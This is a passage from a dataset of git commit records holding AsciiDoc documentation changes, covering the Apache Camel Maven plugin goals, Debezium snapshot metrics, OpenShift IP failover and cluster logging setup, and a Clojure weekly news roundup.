want a quick and easy log to console that looks good.\n\n\n== camel:dev\n\nThe `camel:dev` is an extension to `camel:run` to run the Camel application in developer mode.\nIn this mode, among others, Camel will use hot-reloading of DSL routes (xml, yaml and java) that are located from\nthe `src\/main\/resources` directory.\n\n=== Options\n\nThe maven plugin *dev* goal supports the following options which can be configured from the command line (use `-D` syntax), or defined in the `pom.xml` file in the `<configuration>` tag.\n\n|===\n| Parameter | Default Value | Description\n| routesDirectory | src\/main\/resources | To watch the directory for file changes which triggers a live reload of the Camel routes on-the-fly.\n| duration | -1 | Sets the time duration (seconds) that the application will run for before terminating. A value <= 0 will run forever.\n| durationIdle | -1 | Sets the idle time duration (seconds) duration that the application can be idle before terminating. A value <= 0 will run forever.\n| durationMaxMessages | -1 | Sets the duration of maximum number of messages that the application will process before terminating.\n| logClasspath | false | Whether to log the classpath when starting\n| loggingLevel | OFF | Whether to use built-in console logging (uses log4j), which does not require to add any logging dependency to your project. However, the logging is fixed to log to the console, with a color style that is similar to Spring Boot. You can change the root logging level to: FATAL, ERROR, WARN, INFO, DEBUG, TRACE, OFF\n|===\n\n== camel:debug\n\nThe `camel:debug` is an extension to `camel:dev` to run the Camel application in debug mode which allows to debug the Camel routes thanks to the Camel textual route debugger.\n\n=== Options\n\nThe maven plugin *debug* goal supports the following options which can be configured from the command line (use `-D` syntax), or defined in the `pom.xml` file in the `<configuration>` tag.\n\n|===\n| Parameter | Default Value | Description\n| suspend | true | Indicates whether the message processing done by Camel should be suspended as long as a debugger is not attached.\n|===\n\n== camel:prepare-fatjar\n\nThe `camel:prepare-fatjar` goal of the Camel Maven Plugin is used to prepare your Camel application\nfor being packaged as a _fat jar_. The goal scans the Maven dependencies to discover Camel JARs and\nextract if they have type converters, which gets merged together into a single _uber_ file stored\nin `target\/classes\/META-INF\/services\/org\/apache\/camel\/UberTypeConverterLoader`.\n\nThis _uber_ loader file contains all the combined type converters the Camel application uses at runtime.\nThey are merged together into this single file.\n\nThis is needed as otherwise the _fat jar_ maven plugins (such as maven-assembly-plugin, or maven-shade-plugin)\ncauses the `TypeConverterLoader` files to be overwritten in the assembled JAR which causes not all type converters\nto be loaded by Camel.\n\nThe `UberTypeConverterLoader` ensures they all type converters gets loaded as this file contains all the known\ntype converter files.\n\nTo use this goal, you can add the following to your Camel application `pom.xml` file:\n\n[source,xml]\n----\n <build>\n <plugins>\n <plugin>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-maven-plugin<\/artifactId>\n <version>${camel.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>prepare-fatjar<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n <\/plugins>\n <\/build>\n----\n\nFor example to use this with the `maven-assembly-plugin` you can do as below.\nRemember to specify the class name of *your* main class where it says `com.foo.NameOfMainClass`:\n\n[source,xml]\n----\n <build>\n <plugins>\n <plugin>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-maven-plugin<\/artifactId>\n <version>${camel.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>prepare-fatjar<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n <plugin>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-assembly-plugin<\/artifactId>\n <configuration>\n <archive>\n <manifest>\n <mainClass>com.foo.NameOfMainClass<\/mainClass>\n <\/manifest>\n <\/archive>\n <\/configuration>\n <\/plugin>\n <\/plugins>\n <\/build>\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a2d098f6e2318060572fa2becdef4ee32fbd3a29","subject":"Update 2015-08-11-Un-peu-de-pratique.adoc","message":"Update 2015-08-11-Un-peu-de-pratique.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-08-11-Un-peu-de-pratique.adoc","new_file":"_posts\/2015-08-11-Un-peu-de-pratique.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"3074212bef96af08d6ad8e7bbe47a1e93584dfd4","subject":"DBZ-5748 Remove note that refers to incremental snapshots as TP feature","message":"DBZ-5748 Remove note that refers to incremental snapshots as TP feature\n","repos":"debezium\/debezium,debezium\/debezium,debezium\/debezium,debezium\/debezium","old_file":"documentation\/modules\/ROOT\/partials\/modules\/all-connectors\/ref-connector-monitoring-incremental-snapshot-metrics.adoc","new_file":"documentation\/modules\/ROOT\/partials\/modules\/all-connectors\/ref-connector-monitoring-incremental-snapshot-metrics.adoc","new_contents":"The connector also provides the following additional snapshot metrics when an incremental snapshot is executed:\n\n[cols=\"45%a,25%a,30%a\",options=\"header\"]\n|===\n|Attributes |Type |Description\n\n|[[connectors-insnap-metric-chunkid_{context}]]<<connectors-insnap-metric-chunkid_{context}, `ChunkId`>>\n|`string`\n|The identifier of the current snapshot chunk.\n\n|[[connectors-insnap-metric-chunkfrom_{context}]]<<connectors-insnap-metric-chunkfrom_{context}, `ChunkFrom`>>\n|`string`\n|The lower bound of the primary key set defining the current chunk.\n\n|[[connectors-insnap-metric-chunkto_{context}]]<<connectors-insnap-metric-chunkto_{context}, `ChunkTo`>>\n|`string`\n|The upper bound of the primary key set defining the current chunk.\n\n|[[connectors-insnap-metric-tablefrom_{context}]]<<connectors-insnap-metric-tablefrom_{context}, `TableFrom`>>\n|`string`\n|The lower bound of the primary key set of the currently snapshotted table.\n\n|[[connectors-insnap-metric-tableto_{context}]]<<connectors-insnap-metric-tableto_{context}, `TableTo`>>\n|`string`\n|The upper bound of the primary key set of the currently snapshotted table.\n\n|===\n","old_contents":"The connector also provides the following additional snapshot metrics when an incremental snapshot is executed:\n\n[cols=\"45%a,25%a,30%a\",options=\"header\"]\n|===\n|Attributes |Type |Description\n\n|[[connectors-insnap-metric-chunkid_{context}]]<<connectors-insnap-metric-chunkid_{context}, `ChunkId`>>\n|`string`\n|The identifier of the current snapshot chunk.\n\n|[[connectors-insnap-metric-chunkfrom_{context}]]<<connectors-insnap-metric-chunkfrom_{context}, `ChunkFrom`>>\n|`string`\n|The lower bound of the primary key set defining the current chunk.\n\n|[[connectors-insnap-metric-chunkto_{context}]]<<connectors-insnap-metric-chunkto_{context}, `ChunkTo`>>\n|`string`\n|The upper bound of the primary key set defining the current chunk.\n\n|[[connectors-insnap-metric-tablefrom_{context}]]<<connectors-insnap-metric-tablefrom_{context}, `TableFrom`>>\n|`string`\n|The lower bound of the primary key set of the currently snapshotted table.\n\n|[[connectors-insnap-metric-tableto_{context}]]<<connectors-insnap-metric-tableto_{context}, `TableTo`>>\n|`string`\n|The upper bound of the primary key set of the currently snapshotted table.\n\n|===\n\nifdef::product[]\n[IMPORTANT]\n====\nIncremental snapshots is a Technology Preview feature only. Technology Preview features are not supported with Red Hat production service level agreements (SLAs) and might not be functionally complete. Red Hat does not recommend using them in production. These features provide early access to upcoming product features, enabling customers to test functionality and provide feedback during the development process. For more information about the support scope of Red Hat Technology Preview features, see link:https:\/\/access.redhat.com\/support\/offerings\/techpreview[https:\/\/access.redhat.com\/support\/offerings\/techpreview].\n====\nendif::product[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ae6508579d7f65db913e6cfbc2a0f7c156850f17","subject":"BZ1989549-Fixed keepalived-ipfailover image URL","message":"BZ1989549-Fixed keepalived-ipfailover image URL\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/nw-ipfailover-configuration.adoc","new_file":"modules\/nw-ipfailover-configuration.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * networking\/configuring-ipfailover.adoc\n\n[id=\"nw-ipfailover-configuration_{context}\"]\n= Configuring IP failover\n\nAs a cluster administrator, you can configure IP failover on an entire cluster, or on a subset of nodes, as defined by the label selector. You can also configure multiple IP failover deployment configurations in your cluster, where each one is independent of the others.\n\nThe IP failover deployment configuration ensures that a failover pod runs on each of the nodes matching the constraints or the label used.\n\nThis pod runs Keepalived, which can monitor an endpoint and use Virtual Router Redundancy Protocol (VRRP) to fail over the virtual IP (VIP) from one node to another if the first node cannot reach the service or endpoint.\n\nFor production use, set a `selector` that selects at least two nodes, and set `replicas` equal to the number of selected nodes.\n\n.Prerequisites\n\n* You are logged in to the cluster with a user with `cluster-admin` privileges.\n* You created a pull secret.\n\n.Procedure\n\n\/\/. Create an {product-title} pull secret\n\/\/+\n. Create an IP failover service account:\n+\n[source,terminal]\n----\n$ oc create sa ipfailover\n----\n+\n. Update security context constraints (SCC) for `hostNetwork`:\n+\n[source,terminal]\n----\n$ oc adm policy add-scc-to-user privileged -z ipfailover\n$ oc adm policy add-scc-to-user hostnetwork -z ipfailover\n----\n+\n. Create a deployment YAML file to configure IP failover:\n+\n.Example deployment YAML for IP failover configuration\n[source,yaml]\n----\napiVersion: apps\/v1\nkind: Deployment\nmetadata:\n name: ipfailover-keepalived <1>\n labels:\n ipfailover: hello-openshift\nspec:\n strategy:\n type: Recreate\n replicas: 2\n selector:\n matchLabels:\n ipfailover: hello-openshift\n template:\n metadata:\n labels:\n ipfailover: hello-openshift\n spec:\n serviceAccountName: ipfailover\n privileged: true\n hostNetwork: true\n nodeSelector:\n node-role.kubernetes.io\/worker: \"\"\n containers:\n - name: openshift-ipfailover\n image: quay.io\/openshift\/origin-keepalived-ipfailover\n ports:\n - containerPort: 63000\n hostPort: 63000\n imagePullPolicy: IfNotPresent\n securityContext:\n privileged: true\n volumeMounts:\n - name: lib-modules\n mountPath: \/lib\/modules\n readOnly: true\n - name: host-slash\n mountPath: \/host\n readOnly: true\n mountPropagation: HostToContainer\n - name: etc-sysconfig\n mountPath: \/etc\/sysconfig\n readOnly: true\n - name: config-volume\n mountPath: \/etc\/keepalive\n env:\n - name: OPENSHIFT_HA_CONFIG_NAME\n value: \"ipfailover\"\n - name: OPENSHIFT_HA_VIRTUAL_IPS <2>\n value: \"1.1.1.1-2\"\n - name: OPENSHIFT_HA_VIP_GROUPS <3>\n value: \"10\"\n - name: OPENSHIFT_HA_NETWORK_INTERFACE <4>\n value: \"ens3\" #The host interface to assign the VIPs\n - name: OPENSHIFT_HA_MONITOR_PORT <5>\n value: \"30060\"\n - name: OPENSHIFT_HA_VRRP_ID_OFFSET <6>\n value: \"0\"\n - name: OPENSHIFT_HA_REPLICA_COUNT <7>\n value: \"2\" #Must match the number of replicas in the deployment\n - name: OPENSHIFT_HA_USE_UNICAST\n value: \"false\"\n #- name: OPENSHIFT_HA_UNICAST_PEERS\n #value: \"10.0.148.40,10.0.160.234,10.0.199.110\"\n - name: OPENSHIFT_HA_IPTABLES_CHAIN <8>\n value: \"INPUT\"\n #- name: OPENSHIFT_HA_NOTIFY_SCRIPT <9>\n # value: \/etc\/keepalive\/mynotifyscript.sh\n - name: OPENSHIFT_HA_CHECK_SCRIPT <10>\n value: \"\/etc\/keepalive\/mycheckscript.sh\"\n - name: OPENSHIFT_HA_PREEMPTION <11>\n value: \"preempt_delay 300\"\n - name: OPENSHIFT_HA_CHECK_INTERVAL <12>\n value: \"2\"\n livenessProbe:\n initialDelaySeconds: 10\n exec:\n command:\n - pgrep\n - keepalived\n volumes:\n - name: lib-modules\n hostPath:\n path: \/lib\/modules\n - name: host-slash\n hostPath:\n path: \/\n - name: etc-sysconfig\n hostPath:\n path: \/etc\/sysconfig\n # config-volume contains the check script\n # created with `oc create configmap keepalived-checkscript --from-file=mycheckscript.sh`\n - configMap:\n defaultMode: 0755\n name: keepalived-checkscript\n name: config-volume\n imagePullSecrets:\n - name: openshift-pull-secret <13>\n----\n<1> The name of the IP failover deployment.\n<2> The list of IP address ranges to replicate. This must be provided. For example, `1.2.3.4-6,1.2.3.9`.\n<3> The number of groups to create for VRRP. If not set, a group is created for each virtual IP range specified with the `OPENSHIFT_HA_VIP_GROUPS` variable.\n<4> The interface name that IP failover uses to send VRRP traffic. By default, `eth0` is used.\n<5> The IP failover pod tries to open a TCP connection to this port on each VIP. If connection is established, the service is considered to be running. If this port is set to `0`, the test always passes. The default value is `80`.\n<6> The offset value used to set the virtual router IDs. Using different offset values allows multiple IP failover configurations to exist within the same cluster. The default offset is `0`, and the allowed range is `0` through `255`.\n<7> The number of replicas to create. This must match `spec.replicas` value in IP failover deployment configuration. The default value is `2`.\n<8> The name of the `iptables` chain to automatically add an `iptables` rule to allow the VRRP traffic on. If the value is not set, an `iptables` rule is not added. If the chain does not exist, it is not created, and Keepalived operates in unicast mode. The default is `INPUT`.\n<9> The full path name in the pod file system of a script that is run whenever the state changes.\n<10> The full path name in the pod file system of a script that is periodically run to verify the application is operating.\n<11> The strategy for handling a new higher priority host. The default value is `preempt_delay 300`, which causes a Keepalived instance to take over a VIP after 5 minutes if a lower-priority master is holding the VIP.\n<12> The period, in seconds, that the check script is run. The default value is `2`.\n<13> Create the pull secret before creating the deployment, otherwise you will get an error when creating the deployment.\n\/\/\/\/\n+\n.Example service YAML for IP failover configuration\n[source,yaml]\n----\napiVersion: v1\nkind: Service\nmetadata:\n name: ipfailover-keepalived-service\nspec:\n ports:\n - port: 1985\n targetPort: 1985\n name: todo\n - port: 112\n targetPort: 112\n name: vrrp\n selector:\n ipfailover: hello-openshift\n externalIPs:\n - 1.1.1.1\n - 1.1.1.2\n----\n\/\/\/\/\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * networking\/configuring-ipfailover.adoc\n\n[id=\"nw-ipfailover-configuration_{context}\"]\n= Configuring IP failover\n\nAs a cluster administrator, you can configure IP failover on an entire cluster, or on a subset of nodes, as defined by the label selector. You can also configure multiple IP failover deployment configurations in your cluster, where each one is independent of the others.\n\nThe IP failover deployment configuration ensures that a failover pod runs on each of the nodes matching the constraints or the label used.\n\nThis pod runs Keepalived, which can monitor an endpoint and use Virtual Router Redundancy Protocol (VRRP) to fail over the virtual IP (VIP) from one node to another if the first node cannot reach the service or endpoint.\n\nFor production use, set a `selector` that selects at least two nodes, and set `replicas` equal to the number of selected nodes.\n\n.Prerequisites\n\n* You are logged in to the cluster with a user with `cluster-admin` privileges.\n* You created a pull secret.\n\n.Procedure\n\n\/\/. Create an {product-title} pull secret\n\/\/+\n. Create an IP failover service account:\n+\n[source,terminal]\n----\n$ oc create sa ipfailover\n----\n+\n. Update security context constraints (SCC) for `hostNetwork`:\n+\n[source,terminal]\n----\n$ oc adm policy add-scc-to-user privileged -z ipfailover\n$ oc adm policy add-scc-to-user hostnetwork -z ipfailover\n----\n+\n. Create a deployment YAML file to configure IP failover:\n+\n.Example deployment YAML for IP failover configuration\n[source,yaml]\n----\napiVersion: apps\/v1\nkind: Deployment\nmetadata:\n name: ipfailover-keepalived <1>\n labels:\n ipfailover: hello-openshift\nspec:\n strategy:\n type: Recreate\n replicas: 2\n selector:\n matchLabels:\n ipfailover: hello-openshift\n template:\n metadata:\n labels:\n ipfailover: hello-openshift\n spec:\n serviceAccountName: ipfailover\n privileged: true\n hostNetwork: true\n nodeSelector:\n node-role.kubernetes.io\/worker: \"\"\n containers:\n - name: openshift-ipfailover\n image: quay.io\/openshift\/ose-keepalived-ipfailover:latest\n ports:\n - containerPort: 63000\n hostPort: 63000\n imagePullPolicy: IfNotPresent\n securityContext:\n privileged: true\n volumeMounts:\n - name: lib-modules\n mountPath: \/lib\/modules\n readOnly: true\n - name: host-slash\n mountPath: \/host\n readOnly: true\n mountPropagation: HostToContainer\n - name: etc-sysconfig\n mountPath: \/etc\/sysconfig\n readOnly: true\n - name: config-volume\n mountPath: \/etc\/keepalive\n env:\n - name: OPENSHIFT_HA_CONFIG_NAME\n value: \"ipfailover\"\n - name: OPENSHIFT_HA_VIRTUAL_IPS <2>\n value: \"1.1.1.1-2\"\n - name: OPENSHIFT_HA_VIP_GROUPS <3>\n value: \"10\"\n - name: OPENSHIFT_HA_NETWORK_INTERFACE <4>\n value: \"ens3\" #The host interface to assign the VIPs\n - name: OPENSHIFT_HA_MONITOR_PORT <5>\n value: \"30060\"\n - name: OPENSHIFT_HA_VRRP_ID_OFFSET <6>\n value: \"0\"\n - name: OPENSHIFT_HA_REPLICA_COUNT <7>\n value: \"2\" #Must match the number of replicas in the deployment\n - name: OPENSHIFT_HA_USE_UNICAST\n value: \"false\"\n #- name: OPENSHIFT_HA_UNICAST_PEERS\n #value: \"10.0.148.40,10.0.160.234,10.0.199.110\"\n - name: OPENSHIFT_HA_IPTABLES_CHAIN <8>\n value: \"INPUT\"\n #- name: OPENSHIFT_HA_NOTIFY_SCRIPT <9>\n # value: \/etc\/keepalive\/mynotifyscript.sh\n - name: OPENSHIFT_HA_CHECK_SCRIPT <10>\n value: \"\/etc\/keepalive\/mycheckscript.sh\"\n - name: OPENSHIFT_HA_PREEMPTION <11>\n value: \"preempt_delay 300\"\n - name: OPENSHIFT_HA_CHECK_INTERVAL <12>\n value: \"2\"\n livenessProbe:\n initialDelaySeconds: 10\n exec:\n command:\n - pgrep\n - keepalived\n volumes:\n - name: lib-modules\n hostPath:\n path: \/lib\/modules\n - name: host-slash\n hostPath:\n path: \/\n - name: etc-sysconfig\n hostPath:\n path: \/etc\/sysconfig\n # config-volume contains the check script\n # created with `oc create configmap keepalived-checkscript --from-file=mycheckscript.sh`\n - configMap:\n defaultMode: 0755\n name: keepalived-checkscript\n name: config-volume\n imagePullSecrets:\n - name: openshift-pull-secret <13>\n----\n<1> The name of the IP failover deployment.\n<2> The list of IP address ranges to replicate. This must be provided. For example, `1.2.3.4-6,1.2.3.9`.\n<3> The number of groups to create for VRRP. If not set, a group is created for each virtual IP range specified with the `OPENSHIFT_HA_VIP_GROUPS` variable.\n<4> The interface name that IP failover uses to send VRRP traffic. By default, `eth0` is used.\n<5> The IP failover pod tries to open a TCP connection to this port on each VIP. If connection is established, the service is considered to be running. If this port is set to `0`, the test always passes. The default value is `80`.\n<6> The offset value used to set the virtual router IDs. Using different offset values allows multiple IP failover configurations to exist within the same cluster. The default offset is `0`, and the allowed range is `0` through `255`.\n<7> The number of replicas to create. This must match `spec.replicas` value in IP failover deployment configuration. The default value is `2`.\n<8> The name of the `iptables` chain to automatically add an `iptables` rule to allow the VRRP traffic on. If the value is not set, an `iptables` rule is not added. If the chain does not exist, it is not created, and Keepalived operates in unicast mode. The default is `INPUT`.\n<9> The full path name in the pod file system of a script that is run whenever the state changes.\n<10> The full path name in the pod file system of a script that is periodically run to verify the application is operating.\n<11> The strategy for handling a new higher priority host. The default value is `preempt_delay 300`, which causes a Keepalived instance to take over a VIP after 5 minutes if a lower-priority master is holding the VIP.\n<12> The period, in seconds, that the check script is run. The default value is `2`.\n<13> Create the pull secret before creating the deployment, otherwise you will get an error when creating the deployment.\n\/\/\/\/\n+\n.Example service YAML for IP failover configuration\n[source,yaml]\n----\napiVersion: v1\nkind: Service\nmetadata:\n name: ipfailover-keepalived-service\nspec:\n ports:\n - port: 1985\n targetPort: 1985\n name: todo\n - port: 112\n targetPort: 112\n name: vrrp\n selector:\n ipfailover: hello-openshift\n externalIPs:\n - 1.1.1.1\n - 1.1.1.2\n----\n\/\/\/\/\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0af2fadd8da7290a50ff22e959ae4cfcbce35e59","subject":"add link to deref","message":"add link to deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/11\/23\/deref.adoc","new_file":"content\/news\/2022\/11\/23\/deref.adoc","new_contents":"= Clojure Deref (Nov 23, 2022)\nAlex Miller\n2022-11-23\n:jbake-type: post\n\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\nWelcome to the Clojure Deref! This is a weekly link\/news roundup for the Clojure ecosystem. (https:\/\/twitter.com\/ClojureDeref[@ClojureDeref] https:\/\/clojure.org\/feed.xml[RSS])\n\n== Highlights\n\nIn this week of thanks, thank you to the Clojure community! It is a pleasure to present your work every week here and always a surprise how much the community does every single week.\n\n== Podcasts and videos\n\n* https:\/\/cognitect.com\/cognicast\/172[Janet A Carr - Cognicast Episode 172] - Cognicast\n* https:\/\/www.youtube.com\/watch?v=AYKIR1oh62Y[#1: Michiel Borkent @borkdude] - Show Me Your REPL\n* https:\/\/clojure.stream\/podcast[E84 Exoscale with Pierre-Yves Ritschard] - ClojureStream Podcast with Jacek Schae\n* https:\/\/www.youtube.com\/watch?v=B7_3hVF8zSc[Clojure defpure news \ud83d\udcf0 filter-stack-trace for test errors] - Fred Overflow\n* https:\/\/www.youtube.com\/watch?v=2hBl31QP9Pc[Clojure and the Functional Paradigm] - Codurance\n\n== Blogs and articles\n\n* https:\/\/building.nubank.com.br\/talk-james-gosling-java-at-nubank\/[A mind-blowing conversation with James Gosling, Java\u2019s father] - Building Nubank\n* https:\/\/andreyorst.gitlab.io\/posts\/2022-11-21-clojures-coreasync-pipeline-async-off-by-two-error-explained\/[Clojure's core.async pipeline-async off-by-two error explained] - Andrey Listopadov\n* https:\/\/clojure.stream\/workshops\/babashka[Babashka Workshop] - ClojureStream\n\n== Libraries and tools\n\nNew releases and tools this week:\n\n* https:\/\/github.com\/Datomic\/dev.datafy[dev.datafy] 0.1 - Dev-time datafy and nav\n* https:\/\/github.com\/pedestal\/pedestal[pedestal] 0.5.11-beta-1 - The Pedestal Server-side Libraries\n* https:\/\/github.com\/liquidz\/antq[antq] 2.2.962 - Point out your outdated dependencies\n* https:\/\/github.com\/borkdude\/edamame[edamame] 1.0.16 - Configurable EDN\/Clojure parser with location metadata\n* https:\/\/github.com\/babashka\/nbb[nbb] 1.0.136 - Scripting in Clojure on Node.js using SCI\n* https:\/\/github.com\/clj-commons\/hickory[hickory] 0.7.2 - HTML as data\n* https:\/\/github.com\/liquidz\/antq[antq] 2.2.962 - Point out your outdated dependencies\n* https:\/\/github.com\/fulcrologic\/fulcro-rad[fulcro-rad] 1.3.9 - Fulcro Rapid Application Development\n* https:\/\/github.com\/fulcrologic\/fulcro-rad-semantic-ui[fulcro-rad-semantic-ui] 1.2.18 - Semantic UI Rendering Plugin for RAD\n* https:\/\/github.com\/BetterThanTomorrow\/calva[calva] https:\/\/github.com\/BetterThanTomorrow\/calva\/releases\/tag\/v2.0.320[2.0.320] - Clojure & ClojureScript Interactive Programming for VS Code\n* https:\/\/github.com\/BetterThanTomorrow\/joyride[joyride] 0.0.23 - Making VS Code Hackable since 2022\n* https:\/\/github.com\/babashka\/scittle[scittle] 0.4.11 - Execute Clojure(Script) directly from browser script tags via SCI\n* https:\/\/git.sr.ht\/~jomco\/select-tree[select-tree] 0.1.0 - Clojure library to recursively select subtrees of collections\n","old_contents":"= Clojure Deref (Nov 23, 2022)\nAlex Miller\n2022-11-23\n:jbake-type: post\n\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\nWelcome to the Clojure Deref! This is a weekly link\/news roundup for the Clojure ecosystem. (https:\/\/twitter.com\/ClojureDeref[@ClojureDeref] https:\/\/clojure.org\/feed.xml[RSS])\n\n== Highlights\n\nIn this week of thanks, thank you to the Clojure community! It is a pleasure to present your work every week here and always a surprise how much the community does every single week.\n\n== Podcasts and videos\n\n* https:\/\/cognitect.com\/cognicast\/172[Janet A Carr - Cognicast Episode 172] - Cognicast\n* https:\/\/www.youtube.com\/watch?v=AYKIR1oh62Y[#1: Michiel Borkent @borkdude] - Show Me Your REPL\n* https:\/\/www.youtube.com\/watch?v=B7_3hVF8zSc[Clojure defpure news \ud83d\udcf0 filter-stack-trace for test errors] - Fred Overflow\n* https:\/\/www.youtube.com\/watch?v=2hBl31QP9Pc[Clojure and the Functional Paradigm] - Codurance\n\n== Blogs and articles\n\n* https:\/\/building.nubank.com.br\/talk-james-gosling-java-at-nubank\/[A mind-blowing conversation with James Gosling, Java\u2019s father] - Building Nubank\n* https:\/\/andreyorst.gitlab.io\/posts\/2022-11-21-clojures-coreasync-pipeline-async-off-by-two-error-explained\/[Clojure's core.async pipeline-async off-by-two error explained] - Andrey Listopadov\n* https:\/\/clojure.stream\/workshops\/babashka[Babashka Workshop] - ClojureStream\n\n== Libraries and tools\n\nNew releases and tools this week:\n\n* https:\/\/github.com\/Datomic\/dev.datafy[dev.datafy] 0.1 - Dev-time datafy and nav\n* https:\/\/github.com\/pedestal\/pedestal[pedestal] 0.5.11-beta-1 - The Pedestal Server-side Libraries\n* https:\/\/github.com\/liquidz\/antq[antq] 2.2.962 - Point out your outdated dependencies\n* https:\/\/github.com\/borkdude\/edamame[edamame] 1.0.16 - Configurable EDN\/Clojure parser with location metadata\n* https:\/\/github.com\/babashka\/nbb[nbb] 1.0.136 - Scripting in Clojure on Node.js using SCI\n* https:\/\/github.com\/clj-commons\/hickory[hickory] 0.7.2 - HTML as data\n* https:\/\/github.com\/liquidz\/antq[antq] 2.2.962 - Point out your outdated dependencies\n* https:\/\/github.com\/fulcrologic\/fulcro-rad[fulcro-rad] 1.3.9 - Fulcro Rapid Application Development\n* https:\/\/github.com\/fulcrologic\/fulcro-rad-semantic-ui[fulcro-rad-semantic-ui] 1.2.18 - Semantic UI Rendering Plugin for RAD\n* https:\/\/github.com\/BetterThanTomorrow\/calva[calva] https:\/\/github.com\/BetterThanTomorrow\/calva\/releases\/tag\/v2.0.320[2.0.320] - Clojure & ClojureScript Interactive Programming for VS Code\n* https:\/\/github.com\/BetterThanTomorrow\/joyride[joyride] 0.0.23 - Making VS Code Hackable since 2022\n* https:\/\/github.com\/babashka\/scittle[scittle] 0.4.11 - Execute Clojure(Script) directly from browser script tags via SCI\n* https:\/\/git.sr.ht\/~jomco\/select-tree[select-tree] 0.1.0 - Clojure library to recursively select subtrees of collections\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"eee3a254a6efcce80cd7359e2e5efb134d88b516","subject":"OSD: Fix directions to cluster logging instance","message":"OSD: Fix directions to cluster logging instance\n\nI was walking through these instructions today and had to do things a\nbit differently from what the doc said. Updated accordingly.\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/dedicated-cluster-install-deploy.adoc","new_file":"modules\/dedicated-cluster-install-deploy.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * logging\/dedicated-cluster-deploying.adoc\n\n[id=\"dedicated-cluster-install-deploy\"]\n\n= Installing the Cluster Logging and Elasticsearch Operators\n\nYou can use the {product-title} console to install cluster logging by deploying instances of\nthe Cluster Logging and Elasticsearch Operators. The Cluster Logging Operator\ncreates and manages the components of the logging stack. The Elasticsearch Operator\ncreates and manages the Elasticsearch cluster used by cluster logging.\n\n[NOTE]\n====\nThe {product-title} cluster logging solution requires that you install both the\nCluster Logging Operator and Elasticsearch Operator. When you deploy an instance\nof the Cluster Logging Operator, it also deploys an instance of the Elasticsearch\nOperator.\n====\n\nYour OpenShift Dedicated cluster includes 600 GiB of persistent storage that is\nexclusively available for deploying Elasticsearch for cluster logging.\n\nElasticsearch is a memory-intensive application. Each Elasticsearch node needs\n8G of memory for both memory requests and limits. Each Elasticsearch node can\noperate with a lower memory setting, though this is not recommended for\nproduction deployments.\n\n.Procedure\n\n. Install the Elasticsearch Operator from the OperatorHub:\n\n.. In the {product-title} web console, click *Operators* -> *OperatorHub*.\n\n.. Choose *Elasticsearch* from the list of available Operators, and click *Install*.\n\n.. On the *Create Operator Subscription* page, under *A specific namespace on the cluster* select *openshift-logging*.\nThen, click *Subscribe*.\n\n. Install the Cluster Logging Operator from the OperatorHub:\n\n.. In the {product-title} web console, click *Operators* -> *OperatorHub*.\n\n.. Choose *Cluster Logging* from the list of available Operators, and click *Install*.\n\n.. On the *Create Operator Subscription* page, under *A specific namespace on the cluster* select *openshift-logging*.\nThen, click *Subscribe*.\n\n. Verify the operator installations:\n\n.. Switch to the *Operators* \u2192 *Installed Operators* page.\n\n.. Ensure that *Cluster Logging* and *Elasticsearch* Operators are listed in the\n*openshift-logging* project with a *Status* of *InstallSucceeded*.\n+\n[NOTE]\n====\nDuring installation an operator might display a *Failed* status. If the operator then installs with an *InstallSucceeded* message,\nyou can safely ignore the *Failed* message.\n====\n+\nIf either operator does not appear as installed, to troubleshoot further:\n+\n* Switch to the *Operators* \u2192 *Installed Operators* page and inspect\nthe *Status* column for any errors or failures.\n* Switch to the *Workloads* \u2192 *Pods* page and check the logs in each Pod in the\n`openshift-logging` project that is reporting issues.\n\n. Create and deploy a cluster logging instance:\n\n.. Switch to the *Operators* \u2192 *Installed Operators* page.\n\n.. Click the installed *Cluster Logging* Operator.\n\n.. Under the *Details* tab, in the *Provided APIs* section, in the\n*Cluster Logging* box, click *Create Instance* . Select the *YAML View*\nradio button and paste the following YAML definition into the window\nthat displays.\n+\n.Cluster Logging Custom Resource (CR)\n[source,yaml]\n----\napiVersion: \"logging.openshift.io\/v1\"\nkind: \"ClusterLogging\"\nmetadata:\n name: \"instance\"\n namespace: \"openshift-logging\"\nspec:\n managementState: \"Managed\"\n logStore:\n type: \"elasticsearch\"\n elasticsearch:\n nodeCount: 3\n storage:\n storageClassName: \"gp2\"\n size: \"200Gi\"\n redundancyPolicy: \"SingleRedundancy\"\n nodeSelector:\n node-role.kubernetes.io\/worker: \"\"\n resources:\n requests:\n memory: 8G\n visualization:\n type: \"kibana\"\n kibana:\n replicas: 1\n nodeSelector:\n node-role.kubernetes.io\/worker: \"\"\n curation:\n type: \"curator\"\n curator:\n schedule: \"15 * * * *\"\n nodeSelector:\n node-role.kubernetes.io\/worker: \"\"\n collection:\n logs:\n type: \"fluentd\"\n fluentd: {}\n nodeSelector:\n node-role.kubernetes.io\/worker: 